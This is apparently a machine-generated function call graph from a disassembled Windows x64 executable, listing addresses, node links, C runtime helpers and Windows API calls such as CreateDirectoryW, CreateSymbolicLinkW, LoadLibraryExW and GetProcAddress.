7ff6448745b7 17680->17681 17681->16406 17683 7ff644877e2e 17682->17683 17684 7ff644871c80 49 API calls 17683->17684 17687 7ff644877f52 17683->17687 17690 7ff644877eb5 17684->17690 17685 7ff64487c550 _log10_special 8 API calls 17686 7ff644877f83 17685->17686 17686->16406 17687->17685 17688 7ff644871c80 49 API calls 17688->17690 17689 7ff644874560 10 API calls 17689->17690 17690->17687 17690->17688 17690->17689 17691 7ff644877f0b 17690->17691 17692 7ff644879390 2 API calls 17691->17692 17693 7ff644877f23 CreateDirectoryW 17692->17693 17693->17687 17693->17690 17695 7ff644871637 17694->17695 17696 7ff644871613 17694->17696 17698 7ff6448745c0 108 API calls 17695->17698 17815 7ff644871050 17696->17815 17700 7ff64487164b 17698->17700 17699 7ff644871618 17701 7ff64487162e 17699->17701 17704 7ff644872710 54 API calls 17699->17704 17702 7ff644871682 17700->17702 17703 7ff644871653 17700->17703 17701->16406 17706 7ff6448745c0 108 API calls 17702->17706 17705 7ff644884f08 _get_daylight 11 API calls 17703->17705 17704->17701 17708 7ff644871658 17705->17708 17707 7ff644871696 17706->17707 17709 7ff6448716b8 17707->17709 17710 7ff64487169e 17707->17710 17711 7ff644872910 54 API calls 17708->17711 17713 7ff6448806d4 73 API calls 17709->17713 17712 7ff644872710 54 API calls 17710->17712 17714 7ff644871671 17711->17714 17715 7ff6448716ae 17712->17715 17716 7ff6448716cd 17713->17716 17714->16406 17719 7ff64488004c 74 API calls 17715->17719 17717 7ff6448716f9 17716->17717 17718 7ff6448716d1 17716->17718 17721 7ff644871717 17717->17721 17722 7ff6448716ff 17717->17722 17720 7ff644884f08 _get_daylight 11 API calls 17718->17720 17723 7ff644871829 17719->17723 17724 7ff6448716d6 17720->17724 17728 7ff644871739 17721->17728 17738 7ff644871761 17721->17738 17793 7ff644871210 17722->17793 17723->16406 17726 7ff644872910 54 API calls 17724->17726 17727 7ff6448716ef __vcrt_freefls 17726->17727 17729 7ff64488004c 74 API calls 17727->17729 17730 7ff644884f08 _get_daylight 11 API calls 17728->17730 17729->17715 17731 7ff64487173e 17730->17731 17732 7ff644872910 54 API calls 17731->17732 17732->17727 17733 7ff64488039c _fread_nolock 53 API calls 17733->17738 17734 7ff6448717da 17735 7ff644884f08 _get_daylight 11 API calls 17734->17735 17737 7ff6448717ca 17735->17737 17741 7ff644872910 54 API calls 17737->17741 17738->17727 17738->17733 17738->17734 17739 7ff6448717c5 17738->17739 17846 7ff644880adc 17738->17846 17740 7ff644884f08 _get_daylight 11 API calls 17739->17740 17740->17737 17741->17727 17743 7ff64487718b 17742->17743 17745 7ff644877144 17742->17745 17743->16406 17745->17743 17879 7ff644885024 17745->17879 17747 7ff6448741a1 17746->17747 17748 7ff6448744e0 49 API calls 17747->17748 17749 7ff6448741db 17748->17749 17750 7ff6448744e0 49 API calls 17749->17750 17751 7ff6448741eb 17750->17751 17752 7ff64487423c 17751->17752 17753 7ff64487420d 17751->17753 17755 7ff644874110 51 API calls 17752->17755 17910 7ff644874110 17753->17910 17756 7ff64487423a 17755->17756 17757 7ff64487429c 17756->17757 17758 7ff644874267 17756->17758 17760 7ff644874110 51 API calls 17757->17760 17917 7ff644877cf0 17758->17917 17762 7ff6448742c0 17760->17762 17765 7ff644874110 51 API calls 17762->17765 17770 7ff644874312 17762->17770 17763 7ff644874393 17769 7ff644871950 115 API calls 17763->17769 17764 7ff644872710 54 API calls 17766 7ff644874297 17764->17766 17768 7ff6448742e9 17765->17768 17767 7ff64487c550 _log10_special 8 API calls 17766->17767 17771 7ff644874435 17767->17771 17768->17770 17773 7ff644874110 51 API calls 17768->17773 17772 7ff64487439d 17769->17772 17770->17763 17776 7ff64487438c 17770->17776 17779 7ff644874317 17770->17779 17781 7ff64487437b 17770->17781 17771->16406 17774 7ff6448743a5 17772->17774 17775 7ff6448743fe 17772->17775 17773->17770 17943 7ff644871840 17774->17943 17777 7ff644872710 54 API calls 17775->17777 17776->17774 17776->17779 17777->17779 17782 7ff644872710 54 API calls 17779->17782 17785 7ff644872710 54 API calls 17781->17785 17782->17766 17783 7ff6448743bc 17786 7ff644872710 54 API calls 17783->17786 17784 7ff6448743d2 17787 7ff644871600 118 API calls 17784->17787 17785->17779 17786->17766 17788 7ff6448743e0 17787->17788 17788->17766 17789 7ff644872710 54 API calls 17788->17789 17789->17766 17791 7ff644871c80 49 API calls 17790->17791 17792 7ff644874474 17791->17792 17792->16406 17794 7ff644871268 17793->17794 17795 7ff644871297 17794->17795 17796 7ff64487126f 17794->17796 17799 7ff6448712d4 17795->17799 17800 7ff6448712b1 17795->17800 17797 7ff644872710 54 API calls 17796->17797 17798 7ff644871282 17797->17798 17798->17727 17804 7ff6448712e6 17799->17804 17814 7ff644871309 memcpy_s 17799->17814 17801 7ff644884f08 _get_daylight 11 API calls 17800->17801 17802 7ff6448712b6 17801->17802 17803 7ff644872910 54 API calls 17802->17803 17810 7ff6448712cf __vcrt_freefls 17803->17810 17805 7ff644884f08 _get_daylight 11 API calls 17804->17805 17806 7ff6448712eb 17805->17806 17808 7ff644872910 54 API calls 17806->17808 17807 7ff64488039c _fread_nolock 53 API calls 17807->17814 17808->17810 17809 7ff644880110 37 API calls 17809->17814 17810->17727 17811 7ff6448713cf 17812 7ff644872710 54 API calls 17811->17812 17812->17810 17813 7ff644880adc 76 API calls 17813->17814 17814->17807 17814->17809 17814->17810 17814->17811 17814->17813 17816 7ff6448745c0 108 API calls 17815->17816 17817 7ff64487108c 17816->17817 17818 7ff6448710a9 17817->17818 17819 7ff644871094 17817->17819 17821 7ff6448806d4 73 API calls 17818->17821 17820 7ff644872710 54 API calls 17819->17820 17827 7ff6448710a4 __vcrt_freefls 17820->17827 17822 7ff6448710bf 17821->17822 17823 7ff6448710e6 17822->17823 17824 7ff6448710c3 17822->17824 17828 7ff6448710f7 17823->17828 17829 7ff644871122 17823->17829 17825 7ff644884f08 _get_daylight 11 API calls 17824->17825 17826 7ff6448710c8 17825->17826 17830 7ff644872910 54 API calls 17826->17830 17827->17699 17831 7ff644884f08 _get_daylight 11 API calls 17828->17831 17832 7ff644871129 17829->17832 17840 7ff64487113c 17829->17840 17837 7ff6448710e1 __vcrt_freefls 17830->17837 17833 7ff644871100 17831->17833 17834 7ff644871210 92 API calls 17832->17834 17835 7ff644872910 54 API calls 17833->17835 17834->17837 17835->17837 17836 7ff64488004c 74 API calls 17838 7ff6448711b4 17836->17838 17837->17836 17838->17827 17850 7ff6448746f0 17838->17850 17839 7ff64488039c _fread_nolock 53 API calls 17839->17840 17840->17837 17840->17839 17841 7ff6448711ed 17840->17841 17843 7ff644884f08 _get_daylight 11 API calls 17841->17843 17844 7ff6448711f2 17843->17844 17845 7ff644872910 54 API calls 17844->17845 17845->17837 17847 7ff644880b0c 17846->17847 17864 7ff64488082c 17847->17864 17849 7ff644880b2a 17849->17738 17851 7ff644874700 17850->17851 17852 7ff644879390 2 API calls 17851->17852 17853 7ff64487472b 17852->17853 17854 7ff64487479e 17853->17854 17855 7ff644879390 2 API calls 17853->17855 17857 7ff64487c550 _log10_special 8 API calls 17854->17857 17856 7ff644874746 17855->17856 17856->17854 17858 7ff64487474b CreateSymbolicLinkW 17856->17858 17859 7ff6448747b9 17857->17859 17858->17854 17860 7ff644874775 17858->17860 17859->17827 17860->17854 17861 7ff64487477e GetLastError 17860->17861 17861->17854 17862 7ff644874789 17861->17862 17865 7ff64488084c 17864->17865 17870 7ff644880879 17864->17870 17866 7ff644880856 17865->17866 17867 7ff644880881 17865->17867 17865->17870 17868 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17866->17868 17871 7ff64488076c 17867->17871 17868->17870 17870->17849 17878 7ff64488546c EnterCriticalSection 17871->17878 17880 7ff644885031 17879->17880 17881 7ff64488505e 17879->17881 17883 7ff644884f08 _get_daylight 11 API calls 17880->17883 17887 7ff644884fe8 17880->17887 17882 7ff644885081 17881->17882 17885 7ff64488509d 17881->17885 17884 7ff644884f08 _get_daylight 11 API calls 17882->17884 17886 7ff64488503b 17883->17886 17888 7ff644885086 17884->17888 17894 7ff644884f4c 17885->17894 17890 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17886->17890 17887->17745 17891 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17888->17891 17892 7ff644885046 17890->17892 17893 7ff644885091 17891->17893 17892->17745 17893->17745 17895 7ff644884f6b 17894->17895 17896 7ff644884f70 17894->17896 17895->17893 17896->17895 17897 7ff64488b150 __CxxCallCatchBlock 45 API calls 17896->17897 17898 7ff644884f8b 17897->17898 17902 7ff64488d984 17898->17902 17903 7ff64488d999 17902->17903 17905 7ff644884fae 17902->17905 17904 7ff644893304 45 API calls 17903->17904 17903->17905 17904->17905 17906 7ff64488d9f0 17905->17906 17907 7ff64488da05 17906->17907 17909 7ff64488da18 17906->17909 17908 7ff644892650 45 API calls 17907->17908 17907->17909 17908->17909 17909->17895 17911 7ff644874136 17910->17911 17912 7ff644884984 49 API calls 17911->17912 17913 7ff64487415c 17912->17913 17914 7ff64487416d 17913->17914 17915 7ff644874560 10 API calls 17913->17915 17914->17756 17916 7ff64487417f 17915->17916 17916->17756 17918 7ff644877d05 17917->17918 17919 7ff6448745c0 108 API calls 17918->17919 17920 7ff644877d2b 17919->17920 17921 7ff644877d52 17920->17921 17922 7ff6448745c0 108 API calls 17920->17922 17924 7ff64487c550 _log10_special 8 API calls 17921->17924 17923 7ff644877d42 17922->17923 17925 7ff644877d5c 17923->17925 17926 7ff644877d4d 17923->17926 17927 7ff644874277 17924->17927 17947 7ff6448800e4 17925->17947 17928 7ff64488004c 74 API calls 17926->17928 17927->17764 17927->17766 17928->17921 17930 7ff644877dbf 17931 7ff64488004c 74 API calls 17930->17931 17932 7ff644877de7 17931->17932 17933 7ff64488039c _fread_nolock 53 API calls 17941 7ff644877d61 17933->17941 17935 7ff644877dc6 17937 7ff644880110 37 API calls 17935->17937 17936 7ff644880adc 76 API calls 17936->17941 17938 7ff644877dc1 17937->17938 17938->17930 17953 7ff644887318 17938->17953 17939 7ff644880110 37 API calls 17939->17941 17941->17930 17941->17933 17941->17935 17941->17936 17941->17938 17941->17939 17942 7ff6448800e4 37 API calls 17941->17942 17942->17941 17945 7ff6448718d5 17943->17945 17946 7ff644871865 17943->17946 17944 7ff644885024 45 API calls 17944->17946 17945->17783 17945->17784 17946->17944 17946->17945 17948 7ff6448800ed 17947->17948 17949 7ff6448800fd 17947->17949 17950 7ff644884f08 _get_daylight 11 API calls 17948->17950 17949->17941 17951 7ff6448800f2 17950->17951 17952 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17951->17952 17952->17949 17954 7ff644887320 17953->17954 17955 7ff64488735d 17954->17955 17956 7ff64488733c 17954->17956 17974 7ff644885ec8 17973->17974 17975 7ff644885eee 17974->17975 17978 7ff644885f21 17974->17978 17976 7ff644884f08 _get_daylight 11 API calls 17975->17976 17977 7ff644885ef3 17976->17977 17981 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17977->17981 17979 7ff644885f27 17978->17979 17980 7ff644885f34 17978->17980 17982 7ff644884f08 _get_daylight 11 API calls 17979->17982 17992 7ff64488ac28 17980->17992 17991 7ff644874616 17981->17991 17982->17991 17991->16431 18005 7ff6448902d8 EnterCriticalSection 17992->18005 18366 7ff6448878f8 18365->18366 18369 7ff6448873d4 18366->18369 18368 7ff644887911 18368->16439 18370 7ff6448873ef 18369->18370 18371 7ff64488741e 18369->18371 18372 7ff64488a814 _invalid_parameter_noinfo 37 API calls 18370->18372 18379 7ff64488546c EnterCriticalSection 18371->18379 18374 7ff64488740f 18372->18374 18374->18368 18381 7ff64487fe43 18380->18381 18382 7ff64487fe71 18380->18382 18383 7ff64488a814 _invalid_parameter_noinfo 37 API calls 18381->18383 18389 7ff64487fe63 18382->18389 18390 7ff64488546c EnterCriticalSection 18382->18390 18383->18389 18389->16445 18392 7ff64487caf2 RtlLookupFunctionEntry 18391->18392 18393 7ff64487cb08 RtlVirtualUnwind 18392->18393 18394 7ff64487c90b 18392->18394 18393->18392 18393->18394 18395 7ff64487c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18394->18395 18397 7ff6448745c0 108 API calls 18396->18397 18398 7ff644871493 18397->18398 18399 7ff6448714bc 18398->18399 18400 7ff64487149b 18398->18400 18402 7ff6448806d4 73 API calls 18399->18402 18401 7ff644872710 54 API calls 18400->18401 18403 7ff6448714ab 18401->18403 18404 7ff6448714d1 18402->18404 18403->16487 18405 7ff6448714f8 18404->18405 18406 7ff6448714d5 18404->18406 18410 7ff644871508 18405->18410 18411 7ff644871532 18405->18411 18407 7ff644884f08 _get_daylight 11 API calls 18406->18407 18408 7ff6448714da 18407->18408 18409 7ff644872910 54 API calls 18408->18409 18416 7ff6448714f3 __vcrt_freefls 18409->18416 18412 7ff644884f08 _get_daylight 11 API calls 18410->18412 18413 7ff644871538 18411->18413 18421 7ff64487154b 18411->18421 18414 7ff644871510 18412->18414 18415 7ff644871210 92 API calls 18413->18415 18417 7ff644872910 54 API calls 18414->18417 18415->18416 18418 7ff64488004c 74 API calls 18416->18418 18417->18416 18419 7ff6448715c4 18418->18419 18419->16487 18420 7ff64488039c _fread_nolock 53 API calls 18420->18421 18421->18416 18421->18420 18422 7ff6448715d6 18421->18422 18423 7ff644884f08 _get_daylight 11 API calls 18422->18423 18424 7ff6448715db 18423->18424 18425 7ff644872910 54 API calls 18424->18425 18425->18416 18427 7ff644879390 2 API calls 18426->18427 18428 7ff644878e94 LoadLibraryExW 18427->18428 18429 7ff644878eb3 __vcrt_freefls 18428->18429 18429->16521 18503 7ff644876375 18502->18503 18504 7ff644871c80 49 API calls 18503->18504 18505 7ff6448763b1 18504->18505 18506 7ff6448763dd 18505->18506 18507 7ff6448763ba 18505->18507 18509 7ff644874630 49 API calls 18506->18509 18508 7ff644872710 54 API calls 18507->18508 18525 7ff6448763d3 18508->18525 18510 7ff6448763f5 18509->18510 18511 7ff644876413 18510->18511 18513 7ff644872710 54 API calls 18510->18513 18514 7ff644874560 10 API calls 18511->18514 18512 7ff64487c550 _log10_special 8 API calls 18515 7ff64487336e 18512->18515 18513->18511 18516 7ff64487641d 18514->18516 18515->16561 18533 7ff644876500 18515->18533 18517 7ff64487642b 18516->18517 18518 7ff644878e80 3 API calls 18516->18518 18519 7ff644874630 49 API calls 18517->18519 18518->18517 18520 7ff644876444 18519->18520 18521 7ff644876469 18520->18521 18522 7ff644876449 18520->18522 18524 7ff644878e80 3 API calls 18521->18524 18523 7ff644872710 54 API calls 18522->18523 18523->18525 18526 7ff644876476 18524->18526 18525->18512 18527 7ff644876482 18526->18527 18528 7ff6448764c1 18526->18528 18530 7ff644879390 2 API calls 18527->18530 18592 7ff644875830 GetProcAddress 18528->18592 18531 7ff64487649a GetLastError 18530->18531 18532 7ff644872c50 51 API calls 18531->18532 18532->18525 18682 7ff644875400 18533->18682 18535 7ff644876526 18536 7ff64487652e 18535->18536 18537 7ff64487653f 18535->18537 18538 7ff644872710 54 API calls 18536->18538 18689 7ff644874c90 18537->18689 18544 7ff64487653a 18538->18544 18541 7ff64487655c 18545 7ff64487656c 18541->18545 18547 7ff64487657d 18541->18547 18542 7ff64487654b 18543 7ff644872710 54 API calls 18542->18543 18543->18544 18544->16557 18546 7ff644872710 54 API calls 18545->18546 18546->18544 18548 7ff64487659c 18547->18548 18549 7ff6448765ad 18547->18549 18550 7ff644872710 54 API calls 18548->18550 18551 7ff6448765bc 18549->18551 18552 7ff6448765cd 18549->18552 18550->18544 18571 7ff644876070 18570->18571 18571->18571 18572 7ff644876099 18571->18572 18577 7ff6448760b0 __vcrt_freefls 18571->18577 18573 7ff644872710 54 API calls 18572->18573 18574 7ff6448760a5 18573->18574 18574->16559 18575 7ff6448761bb 18575->16559 18576 7ff644871470 116 API calls 18576->18577 18577->18575 18577->18576 18578 7ff644872710 54 API calls 18577->18578 18578->18577 18593 7ff644875852 GetLastError 18592->18593 18594 7ff64487587f GetProcAddress 18592->18594 18595 7ff64487585f 18593->18595 18596 7ff6448758aa GetProcAddress 18594->18596 18597 7ff64487589b GetLastError 18594->18597 18600 7ff644872c50 51 API calls 18595->18600 18598 7ff6448758c6 GetLastError 18596->18598 18599 7ff6448758d5 GetProcAddress 18596->18599 18597->18595 18598->18595 18601 7ff644875903 GetProcAddress 18599->18601 18602 7ff6448758f1 GetLastError 18599->18602 18603 7ff644875874 18600->18603 18604 7ff644875931 GetProcAddress 18601->18604 18605 7ff64487591f GetLastError 18601->18605 18602->18595 18603->18525 18605->18595 18683 7ff64487542c 18682->18683 18684 7ff644875434 18683->18684 18685 7ff6448755d4 18683->18685 18713 7ff644886aa4 18683->18713 18684->18535 18686 7ff644875797 __vcrt_freefls 18685->18686 18687 7ff6448747d0 47 API calls 18685->18687 18686->18535 18687->18685 18690 7ff644874cc0 18689->18690 18691 7ff64487c550 _log10_special 8 API calls 18690->18691 18692 7ff644874d2a 18691->18692 18692->18541 18692->18542 18714 7ff644886ad4 18713->18714 18717 7ff644885fa0 18714->18717 18716 7ff644886b04 18716->18683 18718 7ff644885fe3 18717->18718 18719 7ff644885fd1 18717->18719 18721 7ff64488602d 18718->18721 18724 7ff644885ff0 18718->18724 18720 7ff644884f08 _get_daylight 11 API calls 18719->18720 18723 7ff644885fd6 18720->18723 18722 7ff644886048 18721->18722 18725 7ff6448847c0 45 API calls 18721->18725 18730 7ff64488606a 18722->18730 18738 7ff644886a2c 18722->18738 18727 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 18723->18727 18728 7ff64488a814 _invalid_parameter_noinfo 37 API calls 18724->18728 18725->18722 18729 7ff644885fe1 18727->18729 18728->18729 18729->18716 18731 7ff64488610b 18730->18731 18732 7ff644884f08 _get_daylight 11 API calls 18730->18732 18731->18729 18733 7ff644884f08 _get_daylight 11 API calls 18731->18733 18734 7ff644886100 18732->18734 18735 7ff6448861b6 18733->18735 18736 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 18734->18736 18737 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 18735->18737 18736->18731 18737->18729 18739 7ff644886a66 18738->18739 18740 7ff644886a4f 18738->18740 18742 7ff644886a54 18739->18742 18749 7ff64488ff98 18739->18749 18744 7ff64488ff68 18740->18744 18742->18722 18745 7ff64488b150 __CxxCallCatchBlock 45 API calls 18744->18745 18746 7ff64488ff71 18745->18746 18750 7ff644884f4c 45 API calls 18749->18750 18752 7ff64488ffd1 18750->18752 18751 7ff64488ffdd 18752->18751 18756 7ff644892e40 18752->18756 18790->16564 18792 7ff64488b150 __CxxCallCatchBlock 45 API calls 18791->18792 18793 7ff64488a3e1 18792->18793 18796 7ff64488a504 18793->18796 18805 7ff644893650 18796->18805 18831 7ff644893608 18805->18831 18836 7ff6448902d8 EnterCriticalSection 18831->18836 19538 7ff64489ad69 19541 7ff644885478 LeaveCriticalSection 19538->19541 18840 7ff644889961 18841 7ff64488a3d8 45 API calls 18840->18841 18842 7ff644889966 18841->18842 18843 7ff6448899d7 18842->18843 18844 7ff64488998d GetModuleHandleW 18842->18844 18852 7ff644889864 18843->18852 18844->18843 18848 7ff64488999a 18844->18848 18848->18843 18866 7ff644889a88 GetModuleHandleExW 18848->18866 18872 7ff6448902d8 EnterCriticalSection 18852->18872 18867 7ff644889ae5 18866->18867 18868 7ff644889abc GetProcAddress 18866->18868 18869 7ff644889af1 18867->18869 18870 7ff644889aea FreeLibrary 18867->18870 18871 7ff644889ace 18868->18871 18869->18843 18870->18869 18871->18867 19126 7ff64489abe3 19127 7ff64489abf3 19126->19127 19130 7ff644885478 LeaveCriticalSection 19127->19130 19006 7ff64487bae0 19007 7ff64487bb0e 19006->19007 19008 7ff64487baf5 19006->19008 19008->19007 19010 7ff64488d5fc 12 API calls 19008->19010 19009 7ff64487bb6e 19010->19009 19199 7ff644885410 19200 7ff64488541b 19199->19200 19208 7ff64488f2a4 19200->19208 19221 7ff6448902d8 EnterCriticalSection 19208->19221 19578 7ff64488f98c 19579 7ff64488fb7e 19578->19579 19581 7ff64488f9ce _isindst 19578->19581 19580 7ff644884f08 _get_daylight 11 API calls 19579->19580 19598 7ff64488fb6e 19580->19598 19581->19579 19584 7ff64488fa4e _isindst 19581->19584 19582 7ff64487c550 _log10_special 8 API calls 19583 7ff64488fb99 19582->19583 19599 7ff644896194 19584->19599 19589 7ff64488fbaa 19590 7ff64488a900 _isindst 17 API calls 19589->19590 19593 7ff64488fbbe 19590->19593 19596 7ff64488faab 19596->19598 19624 7ff6448961d8 19596->19624 19598->19582 19600 7ff64488fa6c 19599->19600 19601 7ff6448961a3 19599->19601 19606 7ff644895598 19600->19606 19631 7ff6448902d8 EnterCriticalSection 19601->19631 19607 7ff6448955a1 19606->19607 19608 7ff64488fa81 19606->19608 19609 7ff644884f08 _get_daylight 11 API calls 19607->19609 19608->19589 19612 7ff6448955c8 19608->19612 19610 7ff6448955a6 19609->19610 19611 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 19610->19611 19611->19608 19613 7ff6448955d1 19612->19613 19614 7ff64488fa92 19612->19614 19615 7ff644884f08 _get_daylight 11 API calls 19613->19615 19614->19589 19618 7ff6448955f8 19614->19618 19616 7ff6448955d6 19615->19616 19617 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 19616->19617 19617->19614 19619 7ff644895601 19618->19619 19621 7ff64488faa3 19618->19621 19620 7ff644884f08 _get_daylight 11 API calls 19619->19620 19622 7ff644895606 19620->19622 19621->19589 19621->19596 19623 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 19622->19623 19623->19621 19632 7ff6448902d8 EnterCriticalSection 19624->19632 19231 7ff64489adfe 19232 7ff64489ae17 19231->19232 19233 7ff64489ae0d 19231->19233 19235 7ff644890338 LeaveCriticalSection 19233->19235 20758 7ff6448916b0 20769 7ff6448973e4 20758->20769 20770 7ff6448973f1 20769->20770 20771 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20770->20771 20772 7ff64489740d 20770->20772 20771->20770 20773 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20772->20773 20774 7ff6448916b9 20772->20774 20773->20772 20775 7ff6448902d8 EnterCriticalSection 20774->20775 18893 7ff644885628 18894 7ff644885642 18893->18894 18895 7ff64488565f 18893->18895 18896 7ff644884ee8 _fread_nolock 11 API calls 18894->18896 18895->18894 18897 7ff644885672 CreateFileW 18895->18897 18898 7ff644885647 18896->18898 18899 7ff6448856dc 18897->18899 18900 7ff6448856a6 18897->18900 18901 7ff644884f08 _get_daylight 11 API calls 18898->18901 18944 7ff644885c04 18899->18944 18918 7ff64488577c GetFileType 18900->18918 18904 7ff64488564f 18901->18904 18909 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 18904->18909 18907 7ff6448856e5 18912 7ff644884e7c _fread_nolock 11 API calls 18907->18912 18908 7ff644885710 18965 7ff6448859c4 18908->18965 18914 7ff64488565a 18909->18914 18910 7ff6448856bb CloseHandle 18910->18914 18911 7ff6448856d1 CloseHandle 18911->18914 18915 7ff6448856ef 18912->18915 18915->18914 18919 7ff6448857ca 18918->18919 18920 7ff644885887 18918->18920 18921 7ff6448857f6 GetFileInformationByHandle 18919->18921 18925 7ff644885b00 21 API calls 18919->18925 18922 7ff6448858b1 18920->18922 18923 7ff64488588f 18920->18923 18926 7ff6448858a2 GetLastError 18921->18926 18927 7ff64488581f 18921->18927 18924 7ff6448858d4 PeekNamedPipe 18922->18924 18934 7ff644885872 18922->18934 18923->18926 18928 7ff644885893 18923->18928 18924->18934 18929 7ff6448857e4 18925->18929 18932 7ff644884e7c _fread_nolock 11 API calls 18926->18932 18930 7ff6448859c4 51 API calls 18927->18930 18931 7ff644884f08 _get_daylight 11 API calls 18928->18931 18929->18921 18929->18934 18935 7ff64488582a 18930->18935 18931->18934 18932->18934 18933 7ff64487c550 _log10_special 8 API calls 18936 7ff6448856b4 18933->18936 18934->18933 18982 7ff644885924 18935->18982 18936->18910 18936->18911 18939 7ff644885924 10 API calls 18940 7ff644885849 18939->18940 18941 7ff644885924 10 API calls 18940->18941 18942 7ff64488585a 18941->18942 18942->18934 18943 7ff644884f08 _get_daylight 11 API calls 18942->18943 18943->18934 18945 7ff644885c3a 18944->18945 18946 7ff644884f08 _get_daylight 11 API calls 18945->18946 18964 7ff644885cd2 __vcrt_freefls 18945->18964 18948 7ff644885c4c 18946->18948 18947 7ff64487c550 _log10_special 8 API calls 18950 7ff6448856e1 18947->18950 18949 7ff644884f08 _get_daylight 11 API calls 18948->18949 18951 7ff644885c54 18949->18951 18950->18907 18950->18908 18952 7ff644887e08 45 API calls 18951->18952 18953 7ff644885c69 18952->18953 18954 7ff644885c7b 18953->18954 18955 7ff644885c71 18953->18955 18957 7ff644884f08 _get_daylight 11 API calls 18954->18957 18956 7ff644884f08 _get_daylight 11 API calls 18955->18956 18960 7ff644885c76 18956->18960 18958 7ff644885c80 18957->18958 18959 7ff644884f08 _get_daylight 11 API calls 18958->18959 18958->18964 18961 7ff644885c8a 18959->18961 18962 7ff644885cc4 GetDriveTypeW 18960->18962 18960->18964 18963 7ff644887e08 45 API calls 18961->18963 18962->18964 18963->18960 18964->18947 18967 7ff6448859ec 18965->18967 18966 7ff64488571d 18975 7ff644885b00 18966->18975 18967->18966 18989 7ff64488f724 18967->18989 18969 7ff644885a80 18969->18966 18970 7ff64488f724 51 API calls 18969->18970 18971 7ff644885a93 18970->18971 18971->18966 18972 7ff64488f724 51 API calls 18971->18972 18973 7ff644885aa6 18972->18973 18973->18966 18974 7ff64488f724 51 API calls 18973->18974 18974->18966 18976 7ff644885b1a 18975->18976 18977 7ff644885b2a 18976->18977 18978 7ff644885b51 18976->18978 18980 7ff644884e7c _fread_nolock 11 API calls 18977->18980 18981 7ff644885b3a 18977->18981 18979 7ff64488f5b8 21 API calls 18978->18979 18979->18981 18980->18981 18981->18915 18983 7ff64488594d FileTimeToSystemTime 18982->18983 18984 7ff644885940 18982->18984 18985 7ff644885961 SystemTimeToTzSpecificLocalTime 18983->18985 18986 7ff644885948 18983->18986 18984->18983 18984->18986 18985->18986 18987 7ff64487c550 _log10_special 8 API calls 18986->18987 18988 7ff644885839 18987->18988 18988->18939 18990 7ff64488f755 18989->18990 18991 7ff64488f731 18989->18991 18994 7ff64488f78f 18990->18994 18995 7ff64488f7ae 18990->18995 18991->18990 18992 7ff64488f736 18991->18992 18993 7ff644884f08 _get_daylight 11 API calls 18992->18993 18996 7ff64488f73b 18993->18996 18997 7ff644884f08 _get_daylight 11 API calls 18994->18997 18998 7ff644884f4c 45 API calls 18995->18998 18999 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 18996->18999 19000 7ff64488f794 18997->19000 19005 7ff64488f7bb 18998->19005 19001 7ff64488f746 18999->19001 19002 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 19000->19002 19001->18969 19003 7ff64488f79f 19002->19003 19003->18969 19004 7ff6448904dc 51 API calls 19004->19005 19005->19003 19005->19004 19250 7ff644897c20 19253 7ff6448925f0 19250->19253 19254 7ff644892642 19253->19254 19255 7ff6448925fd 19253->19255 19259 7ff64488b224 19255->19259 19260 7ff64488b250 FlsSetValue 19259->19260 19261 7ff64488b235 FlsGetValue 19259->19261 19263 7ff64488b25d 19260->19263 19276 7ff64488b242 19260->19276 19262 7ff64488b24a 19261->19262 19261->19276 19262->19260 19266 7ff64488eb98 _get_daylight 11 API calls 19263->19266 19264 7ff64488b248 19279 7ff6448922c4 19264->19279 19265 7ff64488a504 __CxxCallCatchBlock 45 API calls 19267 7ff64488b2c5 19265->19267 19268 7ff64488b26c 19266->19268 19269 7ff64488b28a FlsSetValue 19268->19269 19270 7ff64488b27a FlsSetValue 19268->19270 19272 7ff64488b296 FlsSetValue 19269->19272 19273 7ff64488b2a8 19269->19273 19271 7ff64488b283 19270->19271 19274 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19271->19274 19272->19271 19275 7ff64488aef4 _get_daylight 11 API calls 19273->19275 19274->19276 19277 7ff64488b2b0 19275->19277 19276->19264 19276->19265 19278 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19277->19278 19278->19264 19302 7ff644892534 19279->19302 19281 7ff6448922f9 19317 7ff644891fc4 19281->19317 19284 7ff64488d5fc _fread_nolock 12 API calls 19285 7ff644892327 19284->19285 19286 7ff64489232f 19285->19286 19288 7ff64489233e 19285->19288 19287 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19286->19287 19299 7ff644892316 19287->19299 19288->19288 19324 7ff64489266c 19288->19324 19291 7ff644892454 19296 7ff644892495 19291->19296 19300 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19291->19300 19292 7ff64489243a 19293 7ff644884f08 _get_daylight 11 API calls 19292->19293 19294 7ff64489243f 19293->19294 19295 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19294->19295 19295->19299 19297 7ff6448924fc 19296->19297 19335 7ff644891df4 19296->19335 19298 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19297->19298 19298->19299 19299->19254 19300->19296 19303 7ff644892557 19302->19303 19304 7ff644892561 19303->19304 19350 7ff6448902d8 EnterCriticalSection 19303->19350 19307 7ff6448925d3 19304->19307 19310 7ff64488a504 __CxxCallCatchBlock 45 API calls 19304->19310 19307->19281 19311 7ff6448925eb 19310->19311 19313 7ff644892642 19311->19313 19314 7ff64488b224 50 API calls 19311->19314 19313->19281 19315 7ff64489262c 19314->19315 19316 7ff6448922c4 65 API calls 19315->19316 19316->19313 19318 7ff644884f4c 45 API calls 19317->19318 19319 7ff644891fd8 